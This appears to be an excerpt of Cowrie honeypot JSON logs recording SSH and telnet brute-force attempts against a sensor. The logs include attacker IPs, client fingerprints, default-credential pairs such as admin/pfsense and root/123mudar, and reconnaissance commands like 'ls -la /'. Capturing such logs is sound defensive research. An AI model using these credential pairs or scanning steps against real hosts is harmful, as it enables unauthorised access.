-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T21:01:22.626160Z","src_ip":"212.227.235.229","session":"415b628f4b1a"}
{"eventid":"cowrie.login.failed","username":"admin","password":"26051982","message":"login attempt [admin/26051982] failed","sensor":"my-vps","timestamp":"2025-08-28T21:01:23.096221Z","src_ip":"212.227.235.229","session":"415b628f4b1a"}
{"eventid":"cowrie.login.failed","username":"admin","password":"26031981","message":"login attempt [admin/26031981] failed","sensor":"my-vps","timestamp":"2025-08-28T21:01:24.205925Z","src_ip":"212.227.235.229","session":"415b628f4b1a"}
{"eventid":"cowrie.login.failed","username":"admin","password":"25111979","message":"login attempt [admin/25111979] failed","sensor":"my-vps","timestamp":"2025-08-28T21:01:25.315049Z","src_ip":"212.227.235.229","session":"415b628f4b1a"}
{"eventid":"cowrie.login.failed","username":"admin","password":"251086","message":"login attempt [admin/251086] failed","sensor":"my-vps","timestamp":"2025-08-28T21:01:26.425114Z","src_ip":"212.227.235.229","session":"415b628f4b1a"}
{"eventid":"cowrie.login.failed","username":"admin","password":"25101992","message":"login attempt [admin/25101992] failed","sensor":"my-vps","timestamp":"2025-08-28T21:01:27.534791Z","src_ip":"212.227.235.229","session":"415b628f4b1a"}
{"eventid":"cowrie.session.closed","duration":"6.1","message":"Connection lost after 6.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:01:28.644955Z","src_ip":"212.227.235.229","session":"415b628f4b1a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59957,"dst_ip":"1.2.3.4","dst_port":23,"session":"d9177d9ce895","protocol":"telnet","message":"New connection: 212.227.235.229:59957 (1.2.3.4:23) [session: d9177d9ce895]","sensor":"my-vps","timestamp":"2025-08-28T21:01:48.625483Z"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":49186,"dst_ip":"1.2.3.4","dst_port":22,"session":"3ad7a76f29cb","protocol":"ssh","message":"New connection: 217.72.205.35:49186 (1.2.3.4:22) [session: 3ad7a76f29cb]","sensor":"my-vps","timestamp":"2025-08-28T21:02:20.336531Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:02:20.337590Z","src_ip":"217.72.205.35","session":"3ad7a76f29cb"}
{"eventid":"cowrie.session.closed","duration":37.23539328575134,"message":"Connection lost after 37 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:02:25.860806Z","src_ip":"212.227.235.229","session":"d9177d9ce895"}
{"eventid":"cowrie.session.connect","src_ip":"70.125.180.158","src_port":41970,"dst_ip":"1.2.3.4","dst_port":23,"session":"a7d3b2468149","protocol":"telnet","message":"New connection: 70.125.180.158:41970 (1.2.3.4:23) [session: a7d3b2468149]","sensor":"my-vps","timestamp":"2025-08-28T21:03:23.489063Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47131,"dst_ip":"1.2.3.4","dst_port":22,"session":"5f359a2cbeee","protocol":"ssh","message":"New connection: 212.227.125.160:47131 (1.2.3.4:22) [session: 5f359a2cbeee]","sensor":"my-vps","timestamp":"2025-08-28T21:03:34.463912Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T21:03:34.464617Z","src_ip":"212.227.125.160","session":"5f359a2cbeee"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T21:03:34.545341Z","src_ip":"212.227.125.160","session":"5f359a2cbeee"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-28T21:03:34.980253Z","src_ip":"212.227.125.160","session":"5f359a2cbeee"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:03:36.081143Z","src_ip":"212.227.125.160","session":"5f359a2cbeee"}
{"eventid":"cowrie.session.closed","duration":13.072946786880493,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:03:36.561926Z","src_ip":"70.125.180.158","session":"a7d3b2468149"}
{"eventid":"cowrie.session.connect","src_ip":"146.190.90.85","src_port":37506,"dst_ip":"1.2.3.4","dst_port":23,"session":"b6140e3c9e61","protocol":"telnet","message":"New connection: 146.190.90.85:37506 (1.2.3.4:23) [session: b6140e3c9e61]","sensor":"my-vps","timestamp":"2025-08-28T21:04:07.349383Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-28T21:04:08.570994Z","src_ip":"146.190.90.85","session":"b6140e3c9e61"}
{"eventid":"cowrie.session.closed","duration":3.35968279838562,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:04:10.708998Z","src_ip":"146.190.90.85","session":"b6140e3c9e61"}
{"eventid":"cowrie.session.connect","src_ip":"146.190.90.85","src_port":36404,"dst_ip":"1.2.3.4","dst_port":23,"session":"49f3a9d24f36","protocol":"telnet","message":"New connection: 146.190.90.85:36404 (1.2.3.4:23) [session: 49f3a9d24f36]","sensor":"my-vps","timestamp":"2025-08-28T21:04:10.907546Z"}
{"eventid":"cowrie.login.success","username":"root","password":"","message":"login attempt [root/] succeeded","sensor":"my-vps","timestamp":"2025-08-28T21:04:11.548177Z","src_ip":"146.190.90.85","session":"49f3a9d24f36"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T21:04:11.564302Z","src_ip":"146.190.90.85","session":"49f3a9d24f36"}
{"eventid":"cowrie.command.input","input":"echo SCANNER_TEST","message":"CMD: echo SCANNER_TEST","sensor":"my-vps","timestamp":"2025-08-28T21:04:12.580276Z","src_ip":"146.190.90.85","session":"49f3a9d24f36"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","size":492,"shasum":"f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","duplicate":true,"duration":"2.1","message":"Closing TTY Log: var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:04:13.694026Z","src_ip":"146.190.90.85","session":"49f3a9d24f36"}
{"eventid":"cowrie.session.closed","duration":2.789731740951538,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:04:13.697206Z","src_ip":"146.190.90.85","session":"49f3a9d24f36"}
{"eventid":"cowrie.session.connect","src_ip":"188.143.57.0","src_port":45819,"dst_ip":"1.2.3.4","dst_port":23,"session":"f89d15fb545b","protocol":"telnet","message":"New connection: 188.143.57.0:45819 (1.2.3.4:23) [session: f89d15fb545b]","sensor":"my-vps","timestamp":"2025-08-28T21:04:41.938317Z"}
{"eventid":"cowrie.session.closed","duration":12.88625979423523,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:04:54.824481Z","src_ip":"188.143.57.0","session":"f89d15fb545b"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.85.34","src_port":11026,"dst_ip":"1.2.3.4","dst_port":22,"session":"2d59e1ec95a7","protocol":"ssh","message":"New connection: 196.251.85.34:11026 (1.2.3.4:22) [session: 2d59e1ec95a7]","sensor":"my-vps","timestamp":"2025-08-28T21:05:55.530749Z"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:05:56.307946Z","src_ip":"196.251.85.34","session":"2d59e1ec95a7"}
{"eventid":"cowrie.session.connect","src_ip":"77.90.185.47","src_port":39790,"dst_ip":"1.2.3.4","dst_port":22,"session":"c0143423dd0d","protocol":"ssh","message":"New connection: 77.90.185.47:39790 (1.2.3.4:22) [session: c0143423dd0d]","sensor":"my-vps","timestamp":"2025-08-28T21:05:56.590102Z"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.85.34","src_port":11034,"dst_ip":"1.2.3.4","dst_port":22,"session":"a566ccfc6cda","protocol":"ssh","message":"New connection: 196.251.85.34:11034 (1.2.3.4:22) [session: a566ccfc6cda]","sensor":"my-vps","timestamp":"2025-08-28T21:05:56.705518Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T21:05:56.821133Z","src_ip":"77.90.185.47","session":"c0143423dd0d"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T21:05:56.821897Z","src_ip":"77.90.185.47","session":"c0143423dd0d"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:05:57.442889Z","src_ip":"196.251.85.34","session":"a566ccfc6cda"}
{"eventid":"cowrie.login.failed","username":"admin","password":"pfsense","message":"login attempt [admin/pfsense] failed","sensor":"my-vps","timestamp":"2025-08-28T21:05:57.582944Z","src_ip":"77.90.185.47","session":"c0143423dd0d"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:05:58.600469Z","src_ip":"77.90.185.47","session":"c0143423dd0d"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.85.34","src_port":11036,"dst_ip":"1.2.3.4","dst_port":22,"session":"1189a90b2f43","protocol":"ssh","message":"New connection: 196.251.85.34:11036 (1.2.3.4:22) [session: 1189a90b2f43]","sensor":"my-vps","timestamp":"2025-08-28T21:05:59.864970Z"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:06:00.718968Z","src_ip":"196.251.85.34","session":"1189a90b2f43"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.85.34","src_port":11042,"dst_ip":"1.2.3.4","dst_port":22,"session":"0d75e481f3b1","protocol":"ssh","message":"New connection: 196.251.85.34:11042 (1.2.3.4:22) [session: 0d75e481f3b1]","sensor":"my-vps","timestamp":"2025-08-28T21:06:01.777470Z"}
{"eventid":"cowrie.client.version","version":"CONNECT 196.251.85.34:80 HTTP/1.0","message":"Remote SSH version: CONNECT 196.251.85.34:80 HTTP/1.0","sensor":"my-vps","timestamp":"2025-08-28T21:06:02.370134Z","src_ip":"196.251.85.34","session":"0d75e481f3b1"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:06:02.371372Z","src_ip":"196.251.85.34","session":"0d75e481f3b1"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.85.34","src_port":40540,"dst_ip":"1.2.3.4","dst_port":22,"session":"87583d38e4f6","protocol":"ssh","message":"New connection: 196.251.85.34:40540 (1.2.3.4:22) [session: 87583d38e4f6]","sensor":"my-vps","timestamp":"2025-08-28T21:06:05.451566Z"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:06:06.367697Z","src_ip":"196.251.85.34","session":"87583d38e4f6"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.85.34","src_port":40544,"dst_ip":"1.2.3.4","dst_port":22,"session":"b6c50dd89029","protocol":"ssh","message":"New connection: 196.251.85.34:40544 (1.2.3.4:22) [session: b6c50dd89029]","sensor":"my-vps","timestamp":"2025-08-28T21:06:07.510279Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60082,"dst_ip":"1.2.3.4","dst_port":22,"session":"767c9207a47b","protocol":"ssh","message":"New connection: 212.227.125.160:60082 (1.2.3.4:22) [session: 767c9207a47b]","sensor":"my-vps","timestamp":"2025-08-28T21:06:07.616102Z"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:06:08.361662Z","src_ip":"196.251.85.34","session":"b6c50dd89029"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T21:06:08.896534Z","src_ip":"212.227.125.160","session":"767c9207a47b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T21:06:08.897757Z","src_ip":"212.227.125.160","session":"767c9207a47b"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.85.34","src_port":40558,"dst_ip":"1.2.3.4","dst_port":22,"session":"f44c26576468","protocol":"ssh","message":"New connection: 196.251.85.34:40558 (1.2.3.4:22) [session: f44c26576468]","sensor":"my-vps","timestamp":"2025-08-28T21:06:09.950270Z"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:06:11.745784Z","src_ip":"196.251.85.34","session":"f44c26576468"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.85.34","src_port":40572,"dst_ip":"1.2.3.4","dst_port":22,"session":"b5877db6b10b","protocol":"ssh","message":"New connection: 196.251.85.34:40572 (1.2.3.4:22) [session: b5877db6b10b]","sensor":"my-vps","timestamp":"2025-08-28T21:06:12.959992Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.2","message":"Remote SSH version: SSH-2.0-libssh_0.11.2","sensor":"my-vps","timestamp":"2025-08-28T21:06:12.961480Z","src_ip":"196.251.85.34","session":"b5877db6b10b"}
{"eventid":"cowrie.client.kex","hassh":"4ed0d5b0dc3be39c7f96ba3a3cc77895","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,3des-cbc,aes128-cbc,aes192-cbc,aes256-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","3des-cbc","aes128-cbc","aes192-cbc","aes256-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 4ed0d5b0dc3be39c7f96ba3a3cc77895","sensor":"my-vps","timestamp":"2025-08-28T21:06:12.992227Z","src_ip":"196.251.85.34","session":"b5877db6b10b"}
{"eventid":"cowrie.login.failed","username":"admin","password":"aerohive","message":"login attempt [admin/aerohive] failed","sensor":"my-vps","timestamp":"2025-08-28T21:06:13.385658Z","src_ip":"196.251.85.34","session":"b5877db6b10b"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:06:14.668786Z","src_ip":"196.251.85.34","session":"b5877db6b10b"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.85.34","src_port":37944,"dst_ip":"1.2.3.4","dst_port":22,"session":"439915fe9f77","protocol":"ssh","message":"New connection: 196.251.85.34:37944 (1.2.3.4:22) [session: 439915fe9f77]","sensor":"my-vps","timestamp":"2025-08-28T21:06:16.333528Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.2","message":"Remote SSH version: SSH-2.0-libssh_0.11.2","sensor":"my-vps","timestamp":"2025-08-28T21:06:16.334312Z","src_ip":"196.251.85.34","session":"439915fe9f77"}
{"eventid":"cowrie.client.kex","hassh":"4ed0d5b0dc3be39c7f96ba3a3cc77895","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,3des-cbc,aes128-cbc,aes192-cbc,aes256-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","3des-cbc","aes128-cbc","aes192-cbc","aes256-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 4ed0d5b0dc3be39c7f96ba3a3cc77895","sensor":"my-vps","timestamp":"2025-08-28T21:06:16.354226Z","src_ip":"196.251.85.34","session":"439915fe9f77"}
{"eventid":"cowrie.login.success","username":"root","password":"123mudar","message":"login attempt [root/123mudar] succeeded","sensor":"my-vps","timestamp":"2025-08-28T21:06:16.431963Z","src_ip":"212.227.125.160","session":"767c9207a47b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58908,"dst_ip":"1.2.3.4","dst_port":22,"session":"5b074e88039a","protocol":"ssh","message":"New connection: 212.227.235.229:58908 (1.2.3.4:22) [session: 5b074e88039a]","sensor":"my-vps","timestamp":"2025-08-28T21:06:16.531347Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T21:06:16.532021Z","src_ip":"212.227.235.229","session":"5b074e88039a"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T21:06:16.637486Z","src_ip":"212.227.235.229","session":"5b074e88039a"}
{"eventid":"cowrie.login.failed","username":"user","password":"1234","message":"login attempt [user/1234] failed","sensor":"my-vps","timestamp":"2025-08-28T21:06:16.663004Z","src_ip":"196.251.85.34","session":"439915fe9f77"}
{"eventid":"cowrie.login.failed","username":"ingres","password":"ingres","message":"login attempt [ingres/ingres] failed","sensor":"my-vps","timestamp":"2025-08-28T21:06:16.955295Z","src_ip":"212.227.235.229","session":"5b074e88039a"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:06:17.969275Z","src_ip":"196.251.85.34","session":"439915fe9f77"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:06:18.062267Z","src_ip":"212.227.235.229","session":"5b074e88039a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T21:06:18.966010Z","src_ip":"212.227.125.160","session":"767c9207a47b"}
{"eventid":"cowrie.command.input","input":"ls -la /","message":"CMD: ls -la /","sensor":"my-vps","timestamp":"2025-08-28T21:06:18.966738Z","src_ip":"212.227.125.160","session":"767c9207a47b"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.85.34","src_port":37958,"dst_ip":"1.2.3.4","dst_port":22,"session":"263b9f6a9c61","protocol":"ssh","message":"New connection: 196.251.85.34:37958 (1.2.3.4:22) [session: 263b9f6a9c61]","sensor":"my-vps","timestamp":"2025-08-28T21:06:19.922835Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.2","message":"Remote SSH version: SSH-2.0-libssh_0.11.2","sensor":"my-vps","timestamp":"2025-08-28T21:06:19.923984Z","src_ip":"196.251.85.34","session":"263b9f6a9c61"}
